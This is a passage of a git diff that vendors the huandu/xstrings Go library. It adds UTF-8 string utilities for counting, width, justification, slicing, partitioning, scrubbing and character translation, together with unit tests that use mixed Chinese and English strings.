+ "中cZ英ZZ文zZ混9zZ9杂99进z位": "中dA英AA文aA混0aA0杂00进a位", + }) +} diff --git a/vendor/github.com/huandu/xstrings/count.go b/vendor/github.com/huandu/xstrings/count.go new file mode 100644 index 0000000000..f96e38703a --- /dev/null +++ b/vendor/github.com/huandu/xstrings/count.go @@ -0,0 +1,120 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "unicode" + "unicode/utf8" +) + +// Len returns str's utf8 rune length. +func Len(str string) int { + return utf8.RuneCountInString(str) +} + +// WordCount returns number of words in a string. +// +// Word is defined as a locale dependent string containing alphabetic characters, +// which may also contain but not start with `'` and `-` characters. +func WordCount(str string) int { + var r rune + var size, n int + + inWord := false + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + + switch { + case isAlphabet(r): + if !inWord { + inWord = true + n++ + } + + case inWord && (r == '\'' || r == '-'): + // Still in word. + + default: + inWord = false + } + + str = str[size:] + } + + return n +} + +const minCJKCharacter = '\u3400' + +// Checks r is a letter but not CJK character. +func isAlphabet(r rune) bool { + if !unicode.IsLetter(r) { + return false + } + + switch { + // Quick check for non-CJK character. + case r < minCJKCharacter: + return true + + // Common CJK characters. + case r >= '\u4E00' && r <= '\u9FCC': + return false + + // Rare CJK characters. + case r >= '\u3400' && r <= '\u4D85': + return false + + // Rare and historic CJK characters. + case r >= '\U00020000' && r <= '\U0002B81D': + return false + } + + return true +} + +// Width returns string width in monotype font. +// Multi-byte characters are usually twice the width of single byte characters. +// +// Algorithm comes from `mb_strwidth` in PHP. +// http://php.net/manual/en/function.mb-strwidth.php +func Width(str string) int { + var r rune + var size, n int + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + n += RuneWidth(r) + str = str[size:] + } + + return n +} + +// RuneWidth returns character width in monotype font. +// Multi-byte characters are usually twice the width of single byte characters. +// +// Algorithm comes from `mb_strwidth` in PHP. +// http://php.net/manual/en/function.mb-strwidth.php +func RuneWidth(r rune) int { + switch { + case r == utf8.RuneError || r < '\x20': + return 0 + + case '\x20' <= r && r < '\u2000': + return 1 + + case '\u2000' <= r && r < '\uFF61': + return 2 + + case '\uFF61' <= r && r < '\uFFA0': + return 1 + + case '\uFFA0' <= r: + return 2 + } + + return 0 +} diff --git a/vendor/github.com/huandu/xstrings/count_test.go b/vendor/github.com/huandu/xstrings/count_test.go new file mode 100644 index 0000000000..0500b145fb --- /dev/null +++ b/vendor/github.com/huandu/xstrings/count_test.go @@ -0,0 +1,62 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "fmt" + "testing" +) + +func TestLen(t *testing.T) { + runner := func(str string) string { + return fmt.Sprint(Len(str)) + } + + runTestCases(t, runner, _M{ + "abcdef": "6", + "中文": "2", + "中yin文hun排": "9", + "": "0", + }) +} + +func TestWordCount(t *testing.T) { + runner := func(str string) string { + return fmt.Sprint(WordCount(str)) + } + + runTestCases(t, runner, _M{ + "one word: λ": "3", + "中文": "0", + "你好,sekai!": "1", + "oh, it's super-fancy!!a": "4", + "": "0", + "-": "0", + "it's-'s": "1", + }) +} + +func TestWidth(t *testing.T) { + runner := func(str string) string { + return fmt.Sprint(Width(str)) + } + + runTestCases(t, runner, _M{ + "abcd\t0123\n7890": "12", + "中zh英eng文混排": "15", + "": "0", + }) +} + +func TestRuneWidth(t *testing.T) { + runner := func(str string) string { + return fmt.Sprint(RuneWidth([]rune(str)[0])) + } + + runTestCases(t, runner, _M{ + "a": "1", + "中": "2", + "\x11": "0", + }) +} diff --git a/vendor/github.com/huandu/xstrings/doc.go b/vendor/github.com/huandu/xstrings/doc.go new file mode 100644 index 0000000000..1a6ef069f6 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/doc.go @@ -0,0 +1,8 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +// Package xstrings is to provide string algorithms which are useful but not included in `strings` package. +// See project home page for details. https://github.com/huandu/xstrings +// +// Package xstrings assumes all strings are encoded in utf8. +package xstrings diff --git a/vendor/github.com/huandu/xstrings/format.go b/vendor/github.com/huandu/xstrings/format.go new file mode 100644 index 0000000000..2d02df1c04 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/format.go @@ -0,0 +1,170 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "bytes" + "unicode/utf8" +) + +// ExpandTabs can expand tabs ('\t') rune in str to one or more spaces dpending on +// current column and tabSize. +// The column number is reset to zero after each newline ('\n') occurring in the str. +// +// ExpandTabs uses RuneWidth to decide rune's width. +// For example, CJK characters will be treated as two characters. +// +// If tabSize <= 0, ExpandTabs panics with error. +// +// Samples: +// ExpandTabs("a\tbc\tdef\tghij\tk", 4) => "a bc def ghij k" +// ExpandTabs("abcdefg\thij\nk\tl", 4) => "abcdefg hij\nk l" +// ExpandTabs("z中\t文\tw", 4) => "z中 文 w" +func ExpandTabs(str string, tabSize int) string { + if tabSize <= 0 { + panic("tab size must be positive") + } + + var r rune + var i, size, column, expand int + var output *bytes.Buffer + + orig := str + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + + if r == '\t' { + expand = tabSize - column%tabSize + + if output == nil { + output = allocBuffer(orig, str) + } + + for i = 0; i < expand; i++ { + output.WriteByte(byte(' ')) + } + + column += expand + } else { + if r == '\n' { + column = 0 + } else { + column += RuneWidth(r) + } + + if output != nil { + output.WriteRune(r) + } + } + + str = str[size:] + } + + if output == nil { + return orig + } + + return output.String() +} + +// LeftJustify returns a string with pad string at right side if str's rune length is smaller than length. +// If str's rune length is larger than length, str itself will be returned. +// +// If pad is an empty string, str will be returned. +// +// Samples: +// LeftJustify("hello", 4, " ") => "hello" +// LeftJustify("hello", 10, " ") => "hello " +// LeftJustify("hello", 10, "123") => "hello12312" +func LeftJustify(str string, length int, pad string) string { + l := Len(str) + + if l >= length || pad == "" { + return str + } + + remains := length - l + padLen := Len(pad) + + output := &bytes.Buffer{} + output.Grow(len(str) + (remains/padLen+1)*len(pad)) + output.WriteString(str) + writePadString(output, pad, padLen, remains) + return output.String() +} + +// RightJustify returns a string with pad string at left side if str's rune length is smaller than length. +// If str's rune length is larger than length, str itself will be returned. +// +// If pad is an empty string, str will be returned. +// +// Samples: +// RightJustify("hello", 4, " ") => "hello" +// RightJustify("hello", 10, " ") => " hello" +// RightJustify("hello", 10, "123") => "12312hello" +func RightJustify(str string, length int, pad string) string { + l := Len(str) + + if l >= length || pad == "" { + return str + } + + remains := length - l + padLen := Len(pad) + + output := &bytes.Buffer{} + output.Grow(len(str) + (remains/padLen+1)*len(pad)) + writePadString(output, pad, padLen, remains) + output.WriteString(str) + return output.String() +} + +// Center returns a string with pad string at both side if str's rune length is smaller than length. +// If str's rune length is larger than length, str itself will be returned. +// +// If pad is an empty string, str will be returned. +// +// Samples: +// Center("hello", 4, " ") => "hello" +// Center("hello", 10, " ") => " hello " +// Center("hello", 10, "123") => "12hello123" +func Center(str string, length int, pad string) string { + l := Len(str) + + if l >= length || pad == "" { + return str + } + + remains := length - l + padLen := Len(pad) + + output := &bytes.Buffer{} + output.Grow(len(str) + (remains/padLen+1)*len(pad)) + writePadString(output, pad, padLen, remains/2) + output.WriteString(str) + writePadString(output, pad, padLen, (remains+1)/2) + return output.String() +} + +func writePadString(output *bytes.Buffer, pad string, padLen, remains int) { + var r rune + var size int + + repeats := remains / padLen + + for i := 0; i < repeats; i++ { + output.WriteString(pad) + } + + remains = remains % padLen + + if remains != 0 { + for i := 0; i < remains; i++ { + r, size = utf8.DecodeRuneInString(pad) + output.WriteRune(r) + pad = pad[size:] + } + } +} diff --git a/vendor/github.com/huandu/xstrings/format_test.go b/vendor/github.com/huandu/xstrings/format_test.go new file mode 100644 index 0000000000..54102110ad --- /dev/null +++ b/vendor/github.com/huandu/xstrings/format_test.go @@ -0,0 +1,100 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "strconv" + "strings" + "testing" +) + +func TestExpandTabs(t *testing.T) { + runner := func(str string) (result string) { + defer func() { + if e := recover(); e != nil { + result = e.(string) + } + }() + + input := strings.Split(str, separator) + n, _ := strconv.Atoi(input[1]) + return ExpandTabs(input[0], n) + } + + runTestCases(t, runner, _M{ + sep("a\tbc\tdef\tghij\tk", "4"): "a bc def ghij k", + sep("abcdefg\thij\nk\tl", "4"): "abcdefg hij\nk l", + sep("z中\t文\tw", "4"): "z中 文 w", + sep("abcdef", "4"): "abcdef", + + sep("abc\td\tef\tghij\nk\tl", "3"): "abc d ef ghij\nk l", + sep("abc\td\tef\tghij\nk\tl", "1"): "abc d ef ghij\nk l", + + sep("abc", "0"): "tab size must be positive", + sep("abc", "-1"): "tab size must be positive", + }) +} + +func TestLeftJustify(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + n, _ := strconv.Atoi(input[1]) + return LeftJustify(input[0], n, input[2]) + } + + runTestCases(t, runner, _M{ + sep("hello", "4", " "): "hello", + sep("hello", "10", " "): "hello ", + sep("hello", "10", "123"): "hello12312", + + sep("hello中文test", "4", " "): "hello中文test", + sep("hello中文test", "12", " "): "hello中文test ", + sep("hello中文test", "18", "测试!"): "hello中文test测试!测试!测", + + sep("hello中文test", "0", "123"): "hello中文test", + sep("hello中文test", "18", ""): "hello中文test", + }) +} + +func TestRightJustify(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + n, _ := strconv.Atoi(input[1]) + return RightJustify(input[0], n, input[2]) + } + + runTestCases(t, runner, _M{ + sep("hello", "4", " "): "hello", + sep("hello", "10", " "): " hello", + sep("hello", "10", "123"): "12312hello", + + sep("hello中文test", "4", " "): "hello中文test", + sep("hello中文test", "12", " "): " hello中文test", + sep("hello中文test", "18", "测试!"): "测试!测试!测hello中文test", + + sep("hello中文test", "0", "123"): "hello中文test", + sep("hello中文test", "18", ""): "hello中文test", + }) +} + +func TestCenter(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + n, _ := strconv.Atoi(input[1]) + return Center(input[0], n, input[2]) + } + + runTestCases(t, runner, _M{ + sep("hello", "4", " "): "hello", + sep("hello", "10", " "): " hello ", + sep("hello", "10", "123"): "12hello123", + + sep("hello中文test", "4", " "): "hello中文test", + sep("hello中文test", "12", " "): "hello中文test ", + sep("hello中文test", "18", "测试!"): "测试!hello中文test测试!测", + + sep("hello中文test", "0", "123"): "hello中文test", + sep("hello中文test", "18", ""): "hello中文test", + }) +} diff --git a/vendor/github.com/huandu/xstrings/manipulate.go b/vendor/github.com/huandu/xstrings/manipulate.go new file mode 100644 index 0000000000..0eefb43ed7 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/manipulate.go @@ -0,0 +1,217 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "bytes" + "strings" + "unicode/utf8" +) + +// Reverse a utf8 encoded string. +func Reverse(str string) string { + var size int + + tail := len(str) + buf := make([]byte, tail) + s := buf + + for len(str) > 0 { + _, size = utf8.DecodeRuneInString(str) + tail -= size + s = append(s[:tail], []byte(str[:size])...) + str = str[size:] + } + + return string(buf) +} + +// Slice a string by rune. +// +// Start must satisfy 0 <= start <= rune length. +// +// End can be positive, zero or negative. +// If end >= 0, start and end must satisfy start <= end <= rune length. +// If end < 0, it means slice to the end of string. +// +// Otherwise, Slice will panic as out of range. +func Slice(str string, start, end int) string { + var size, startPos, endPos int + + origin := str + + if start < 0 || end > len(str) || (end >= 0 && start > end) { + panic("out of range") + } + + if end >= 0 { + end -= start + } + + for start > 0 && len(str) > 0 { + _, size = utf8.DecodeRuneInString(str) + start-- + startPos += size + str = str[size:] + } + + if end < 0 { + return origin[startPos:] + } + + endPos = startPos + + for end > 0 && len(str) > 0 { + _, size = utf8.DecodeRuneInString(str) + end-- + endPos += size + str = str[size:] + } + + if len(str) == 0 && (start > 0 || end > 0) { + panic("out of range") + } + + return origin[startPos:endPos] +} + +// Partition splits a string by sep into three parts. +// The return value is a slice of strings with head, match and tail. +// +// If str contains sep, for example "hello" and "l", Partition returns +// "he", "l", "lo" +// +// If str doesn't contain sep, for example "hello" and "x", Partition returns +// "hello", "", "" +func Partition(str, sep string) (head, match, tail string) { + index := strings.Index(str, sep) + + if index == -1 { + head = str + return + } + + head = str[:index] + match = str[index : index+len(sep)] + tail = str[index+len(sep):] + return +} + +// LastPartition splits a string by last instance of sep into three parts. +// The return value is a slice of strings with head, match and tail. +// +// If str contains sep, for example "hello" and "l", LastPartition returns +// "hel", "l", "o" +// +// If str doesn't contain sep, for example "hello" and "x", LastPartition returns +// "", "", "hello" +func LastPartition(str, sep string) (head, match, tail string) { + index := strings.LastIndex(str, sep) + + if index == -1 { + tail = str + return + } + + head = str[:index] + match = str[index : index+len(sep)] + tail = str[index+len(sep):] + return +} + +// Insert src into dst at given rune index. +// Index is counted by runes instead of bytes. +// +// If index is out of range of dst, panic with out of range. +func Insert(dst, src string, index int) string { + return Slice(dst, 0, index) + src + Slice(dst, index, -1) +} + +// Scrub scrubs invalid utf8 bytes with repl string. +// Adjacent invalid bytes are replaced only once. +func Scrub(str, repl string) string { + var buf *bytes.Buffer + var r rune + var size, pos int + var hasError bool + + origin := str + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + + if r == utf8.RuneError { + if !hasError { + if buf == nil { + buf = &bytes.Buffer{} + } + + buf.WriteString(origin[:pos]) + hasError = true + } + } else if hasError { + hasError = false + buf.WriteString(repl) + + origin = origin[pos:] + pos = 0 + } + + pos += size + str = str[size:] + } + + if buf != nil { + buf.WriteString(origin) + return buf.String() + } + + // No invalid byte. + return origin +} + +// WordSplit splits a string into words. Returns a slice of words. +// If there is no word in a string, return nil. +// +// Word is defined as a locale dependent string containing alphabetic characters, +// which may also contain but not start with `'` and `-` characters. +func WordSplit(str string) []string { + var word string + var words []string + var r rune + var size, pos int + + inWord := false + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + + switch { + case isAlphabet(r): + if !inWord { + inWord = true + word = str + pos = 0 + } + + case inWord && (r == '\'' || r == '-'): + // Still in word. + + default: + if inWord { + inWord = false + words = append(words, word[:pos]) + } + } + + pos += size + str = str[size:] + } + + if inWord { + words = append(words, word[:pos]) + } + + return words +} diff --git a/vendor/github.com/huandu/xstrings/manipulate_test.go b/vendor/github.com/huandu/xstrings/manipulate_test.go new file mode 100644 index 0000000000..39d413742b --- /dev/null +++ b/vendor/github.com/huandu/xstrings/manipulate_test.go @@ -0,0 +1,142 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "strconv" + "strings" + "testing" +) + +func TestReverse(t *testing.T) { + runTestCases(t, Reverse, _M{ + "reverse string": "gnirts esrever", + "中文如何?": "?何如文中", + "中en文混~排怎样?a": "a?样怎排~混文ne中", + }) +} + +func TestSlice(t *testing.T) { + runner := func(str string) (result string) { + defer func() { + if e := recover(); e != nil { + result = e.(string) + } + }() + + strs := split(str) + start, _ := strconv.ParseInt(strs[1], 10, 0) + end, _ := strconv.ParseInt(strs[2], 10, 0) + + result = Slice(strs[0], int(start), int(end)) + return + } + + runTestCases(t, runner, _M{ + sep("abcdefghijk", "3", "8"): "defgh", + sep("来点中文如何?", "2", "7"): "中文如何?", + sep("中en文混~排总是少不了的a", "2", "8"): "n文混~排总", + sep("中en文混~排总是少不了的a", "0", "0"): "", + sep("中en文混~排总是少不了的a", "14", "14"): "", + sep("中en文混~排总是少不了的a", "5", "-1"): "~排总是少不了的a", + sep("中en文混~排总是少不了的a", "14", "-1"): "", + + sep("let us slice out of range", "-3", "3"): "out of range", + sep("超出范围哦", "2", "6"): "out of range", + sep("don't do this", "3", "2"): "out of range", + sep("千gan万de不piao要liang", "19", "19"): "out of range", + }) +} + +func TestPartition(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + head, match, tail := Partition(input[0], input[1]) + return sep(head, match, tail) + } + + runTestCases(t, runner, _M{ + sep("hello", "l"): sep("he", "l", "lo"), + sep("中文总少不了", "少"): sep("中文总", "少", "不了"), + sep("z这个zh英文混排hao不", "h英文"): sep("z这个z", "h英文", "混排hao不"), + sep("边界tiao件zen能忘", "边界"): sep("", "边界", "tiao件zen能忘"), + sep("尾巴ye别忘le", "忘le"): sep("尾巴ye别", "忘le", ""), + + sep("hello", "x"): sep("hello", "", ""), + sep("不是晩香玉", "晚"): sep("不是晩香玉", "", ""), // Hint: 晩 is not 晚 :) + sep("来ge混排ba", "e 混"): sep("来ge混排ba", "", ""), + }) +} + +func TestLastPartition(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + head, match, tail := LastPartition(input[0], input[1]) + return sep(head, match, tail) + } + + runTestCases(t, runner, _M{ + sep("hello", "l"): sep("hel", "l", "o"), + sep("少量中文总少不了", "少"): sep("少量中文总", "少", "不了"), + sep("z这个zh英文ch英文混排hao不", "h英文"): sep("z这个zh英文c", "h英文", "混排hao不"), + sep("边界tiao件zen能忘边界", "边界"): sep("边界tiao件zen能忘", "边界", ""), + sep("尾巴ye别忘le", "尾巴"): sep("", "尾巴", "ye别忘le"), + + sep("hello", "x"): sep("", "", "hello"), + sep("不是晩香玉", "晚"): sep("", "", "不是晩香玉"), // Hint: 晩 is not 晚 :) + sep("来ge混排ba", "e 混"): sep("", "", "来ge混排ba"), + }) +} + +func TestInsert(t *testing.T) { + runner := func(str string) (result string) { + defer func() { + if e := recover(); e != nil { + result = e.(string) + } + }() + + strs := split(str) + index, _ := strconv.ParseInt(strs[2], 10, 0) + result = Insert(strs[0], strs[1], int(index)) + return + } + + runTestCases(t, runner, _M{ + sep("abcdefg", "hi", "3"): "abchidefg", + sep("少量中文是必须的", "混pai", "4"): "少量中文混pai是必须的", + sep("zh英文hun排", "~!", "5"): "zh英文h~!un排", + sep("插在begining", "我", "0"): "我插在begining", + sep("插在ending", "我", "8"): "插在ending我", + + sep("超tian出yuan边tu界po", "foo", "-1"): "out of range", + sep("超tian出yuan边tu界po", "foo", "17"): "out of range", + }) +} + +func TestScrub(t *testing.T) { + runner := func(str string) string { + strs := split(str) + return Scrub(strs[0], strs[1]) + } + + runTestCases(t, runner, _M{ + sep("ab\uFFFDcd\xFF\xCEefg\xFF\xFC\xFD\xFAhijk", "*"): "ab*cd*efg*hijk", + sep("no错误です", "*"): "no错误です", + sep("", "*"): "", + }) +} + +func TestWordSplit(t *testing.T) { + runner := func(str string) string { + return sep(WordSplit(str)...) + } + + runTestCases(t, runner, _M{ + "one word": sep("one", "word"), + "一个字:把他给我拿下!": "", + "it's a super-fancy one!!!a": sep("it's", "a", "super-fancy", "one", "a"), + "a -b-c' 'd'e": sep("a", "b-c'", "d'e"), + }) +} diff --git a/vendor/github.com/huandu/xstrings/translate.go b/vendor/github.com/huandu/xstrings/translate.go new file mode 100644 index 0000000000..d86a4cbbd3 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/translate.go @@ -0,0 +1,547 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "bytes" + "unicode" + "unicode/utf8" +) + +type runeRangeMap struct { + FromLo rune // Lower bound of range map. + FromHi rune // An inclusive higher bound of range map. + ToLo rune + ToHi rune +} + +type runeDict struct { + Dict [unicode.MaxASCII + 1]rune +} + +type runeMap map[rune]rune + +// Translator can translate string with pre-compiled from and to patterns. +// If a from/to pattern pair needs to be used more than once, it's recommended +// to create a Translator and reuse it. +type Translator struct { + quickDict *runeDict // A quick dictionary to look up rune by index. Only availabe for latin runes. + runeMap runeMap // Rune map for translation. + ranges []*runeRangeMap // Ranges of runes. + mappedRune rune // If mappedRune >= 0, all matched runes are translated to the mappedRune. + reverted bool // If to pattern is empty, all matched characters will be deleted. + hasPattern bool +} + +// NewTranslator creates new Translator through a from/to pattern pair. +func NewTranslator(from, to string) *Translator { + tr := &Translator{} + + if from == "" { + return tr + } + + reverted := from[0] == '^' + deletion := len(to) == 0 + + if reverted { + from = from[1:] + } + + var fromStart, fromEnd, fromRangeStep rune + var toStart, toEnd, toRangeStep rune + var fromRangeSize, toRangeSize rune + var singleRunes []rune + + // Update the to rune range. + updateRange := func() { + // No more rune to read in the to rune pattern. + if toEnd == utf8.RuneError { + return + } + + if toRangeStep == 0 { + to, toStart, toEnd, toRangeStep = nextRuneRange(to, toEnd) + return + } + + // Current range is not empty. Consume 1 rune from start. + if toStart != toEnd { + toStart += toRangeStep + return + } + + // No more rune. Repeat the last rune. + if to == "" { + toEnd = utf8.RuneError + return + } + + // Both start and end are used. Read two more runes from the to pattern. + to, toStart, toEnd, toRangeStep = nextRuneRange(to, utf8.RuneError) + } + + if deletion { + toStart = utf8.RuneError + toEnd = utf8.RuneError + } else { + // If from pattern is reverted, only the last rune in the to pattern will be used. + if reverted { + var size int + + for len(to) > 0 { + toStart, size = utf8.DecodeRuneInString(to) + to = to[size:] + } + + toEnd = utf8.RuneError + } else { + to, toStart, toEnd, toRangeStep = nextRuneRange(to, utf8.RuneError) + } + } + + fromEnd = utf8.RuneError + + for len(from) > 0 { + from, fromStart, fromEnd, fromRangeStep = nextRuneRange(from, fromEnd) + + // fromStart is a single character. Just map it with a rune in the to pattern. + if fromRangeStep == 0 { + singleRunes = tr.addRune(fromStart, toStart, singleRunes) + updateRange() + continue + } + + for toEnd != utf8.RuneError && fromStart != fromEnd { + // If mapped rune is a single character instead of a range, simply shift first + // rune in the range. + if toRangeStep == 0 { + singleRunes = tr.addRune(fromStart, toStart, singleRunes) + updateRange() + fromStart += fromRangeStep + continue + } + + fromRangeSize = (fromEnd - fromStart) * fromRangeStep + toRangeSize = (toEnd - toStart) * toRangeStep + + // Not enough runes in the to pattern. Need to read more. + if fromRangeSize > toRangeSize { + fromStart, toStart = tr.addRuneRange(fromStart, fromStart+toRangeSize*fromRangeStep, toStart, toEnd, singleRunes) + fromStart += fromRangeStep + updateRange() + + // Edge case: If fromRangeSize == toRangeSize + 1, the last fromStart value needs be considered + // as a single rune. + if fromStart == fromEnd { + singleRunes = tr.addRune(fromStart, toStart, singleRunes) + updateRange() + } + + continue + } + + fromStart, toStart = tr.addRuneRange(fromStart, fromEnd, toStart, toStart+fromRangeSize*toRangeStep, singleRunes) + updateRange() + break + } + + if fromStart == fromEnd { + fromEnd = utf8.RuneError + continue + } + + fromStart, toStart = tr.addRuneRange(fromStart, fromEnd, toStart, toStart, singleRunes) + fromEnd = utf8.RuneError + } + + if fromEnd != utf8.RuneError { + singleRunes = tr.addRune(fromEnd, toStart, singleRunes) + } + + tr.reverted = reverted + tr.mappedRune = -1 + tr.hasPattern = true + + // Translate RuneError only if in deletion or reverted mode. + if deletion || reverted { + tr.mappedRune = toStart + } + + return tr +} + +func (tr *Translator) addRune(from, to rune, singleRunes []rune) []rune { + if from <= unicode.MaxASCII { + if tr.quickDict == nil { + tr.quickDict = &runeDict{} + } + + tr.quickDict.Dict[from] = to + } else { + if tr.runeMap == nil { + tr.runeMap = make(runeMap) + } + + tr.runeMap[from] = to + } + + singleRunes = append(singleRunes, from) + return singleRunes +} + +func (tr *Translator) addRuneRange(fromLo, fromHi, toLo, toHi rune, singleRunes []rune) (rune, rune) { + var r rune + var rrm *runeRangeMap + + if fromLo < fromHi { + rrm = &runeRangeMap{ + FromLo: fromLo, + FromHi: fromHi, + ToLo: toLo, + ToHi: toHi, + } + } else { + rrm = &runeRangeMap{ + FromLo: fromHi, + FromHi: fromLo, + ToLo: toHi, + ToHi: toLo, + } + } + + // If there is any single rune conflicts with this rune range, clear single rune record. + for _, r = range singleRunes { + if rrm.FromLo <= r && r <= rrm.FromHi { + if r <= unicode.MaxASCII { + tr.quickDict.Dict[r] = 0 + } else { + delete(tr.runeMap, r) + } + } + } + + tr.ranges = append(tr.ranges, rrm) + return fromHi, toHi +} + +func nextRuneRange(str string, last rune) (remaining string, start, end rune, rangeStep rune) { + var r rune + var size int + + remaining = str + escaping := false + isRange := false + + for len(remaining) > 0 { + r, size = utf8.DecodeRuneInString(remaining) + remaining = remaining[size:] + + // Parse special characters. + if !escaping { + if r == '\\' { + escaping = true + continue + } + + if r == '-' { + // Ignore slash at beginning of string. + if last == utf8.RuneError { + continue + } + + start = last + isRange = true + continue + } + } + + escaping = false + + if last != utf8.RuneError { + // This is a range which start and end are the same. + // Considier it as a normal character. + if isRange && last == r { + isRange = false + continue + } + + start = last + end = r + + if isRange { + if start < end { + rangeStep = 1 + } else { + rangeStep = -1 + } + } + + return + } + + last = r + } + + start = last + end = utf8.RuneError + return +} + +// Translate str with a from/to pattern pair. +// +// See comment in Translate function for usage and samples. +func (tr *Translator) Translate(str string) string { + if !tr.hasPattern || str == "" { + return str + } + + var r rune + var size int + var needTr bool + + orig := str + + var output *bytes.Buffer + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + r, needTr = tr.TranslateRune(r) + + if needTr && output == nil { + output = allocBuffer(orig, str) + } + + if r != utf8.RuneError && output != nil { + output.WriteRune(r) + } + + str = str[size:] + } + + // No character is translated. + if output == nil { + return orig + } + + return output.String() +} + +// TranslateRune return translated rune and true if r matches the from pattern. +// If r doesn't match the pattern, original r is returned and translated is false. +func (tr *Translator) TranslateRune(r rune) (result rune, translated bool) { + switch { + case tr.quickDict != nil: + if r <= unicode.MaxASCII { + result = tr.quickDict.Dict[r] + + if result != 0 { + translated = true + + if tr.mappedRune >= 0 { + result = tr.mappedRune + } + + break + } + } + + fallthrough + + case tr.runeMap != nil: + var ok bool + + if result, ok = tr.runeMap[r]; ok { + translated = true + + if tr.mappedRune >= 0 { + result = tr.mappedRune + } + + break + } + + fallthrough + + default: + var rrm *runeRangeMap + ranges := tr.ranges + + for i := len(ranges) - 1; i >= 0; i-- { + rrm = ranges[i] + + if rrm.FromLo <= r && r <= rrm.FromHi { + translated = true + + if tr.mappedRune >= 0 { + result = tr.mappedRune + break + } + + if rrm.ToLo < rrm.ToHi { + result = rrm.ToLo + r - rrm.FromLo + } else if rrm.ToLo > rrm.ToHi { + // ToHi can be smaller than ToLo if range is from higher to lower. + result = rrm.ToLo - r + rrm.FromLo + } else { + result = rrm.ToLo + } + + break + } + } + } + + if tr.reverted { + if !translated { + result = tr.mappedRune + } + + translated = !translated + } + + if !translated { + result = r + } + + return +} + +// HasPattern returns true if Translator has one pattern at least. +func (tr *Translator) HasPattern() bool { + return tr.hasPattern +} + +// Translate str with the characters defined in from replaced by characters defined in to. +// +// From and to are patterns representing a set of characters. Pattern is defined as following. +// +// * Special characters +// * '-' means a range of runes, e.g. +// * "a-z" means all characters from 'a' to 'z' inclusive; +// * "z-a" means all characters from 'z' to 'a' inclusive. +// * '^' as first character means a set of all runes excepted listed, e.g. +// * "^a-z" means all characters except 'a' to 'z' inclusive. +// * '\' escapes special characters. +// * Normal character represents itself, e.g. "abc" is a set including 'a', 'b' and 'c'. +// +// Translate will try to find a 1:1 mapping from from to to. +// If to is smaller than from, last rune in to will be used to map "out of range" characters in from. +// +// Note that '^' only works in the from pattern. It will be considered as a normal character in the to pattern. +// +// If the to pattern is an empty string, Translate works exactly the same as Delete. +// +// Samples: +// Translate("hello", "aeiou", "12345") => "h2ll4" +// Translate("hello", "a-z", "A-Z") => "HELLO" +// Translate("hello", "z-a", "a-z") => "svool" +// Translate("hello", "aeiou", "*") => "h*ll*" +// Translate("hello", "^l", "*") => "**ll*" +// Translate("hello ^ world", `\^lo`, "*") => "he*** * w*r*d" +func Translate(str, from, to string) string { + tr := NewTranslator(from, to) + return tr.Translate(str) +} + +// Delete runes in str matching the pattern. +// Pattern is defined in Translate function. +// +// Samples: +// Delete("hello", "aeiou") => "hll" +// Delete("hello", "a-k") => "llo" +// Delete("hello", "^a-k") => "he" +func Delete(str, pattern string) string { + tr := NewTranslator(pattern, "") + return tr.Translate(str) +} + +// Count how many runes in str match the pattern. +// Pattern is defined in Translate function. +// +// Samples: +// Count("hello", "aeiou") => 3 +// Count("hello", "a-k") => 3 +// Count("hello", "^a-k") => 2 +func Count(str, pattern string) int { + if pattern == "" || str == "" { + return 0 + } + + var r rune + var size int + var matched bool + + tr := NewTranslator(pattern, "") + cnt := 0 + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + str = str[size:] + + if _, matched = tr.TranslateRune(r); matched { + cnt++ + } + } + + return cnt +} + +// Squeeze deletes adjacent repeated runes in str. +// If pattern is not empty, only runes matching the pattern will be squeezed. +// +// Samples: +// Squeeze("hello", "") => "helo" +// Squeeze("hello", "m-z") => "hello" +// Squeeze("hello world", " ") => "hello world" +func Squeeze(str, pattern string) string { + var last, r rune + var size int + var skipSqueeze, matched bool + var tr *Translator + var output *bytes.Buffer + + orig := str + last = -1 + + if len(pattern) > 0 { + tr = NewTranslator(pattern, "") + } + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + + // Need to squeeze the str. + if last == r && !skipSqueeze { + if tr != nil { + if _, matched = tr.TranslateRune(r); !matched { + skipSqueeze = true + } + } + + if output == nil { + output = allocBuffer(orig, str) + } + + if skipSqueeze { + output.WriteRune(r) + } + } else { + if output != nil { + output.WriteRune(r) + } + + last = r + skipSqueeze = false + } + + str = str[size:] + } + + if output == nil { + return orig + } + + return output.String() +} diff --git a/vendor/github.com/huandu/xstrings/translate_test.go b/vendor/github.com/huandu/xstrings/translate_test.go new file mode 100644 index 0000000000..0a6acb1b93 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/translate_test.go @@ -0,0 +1,96 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the 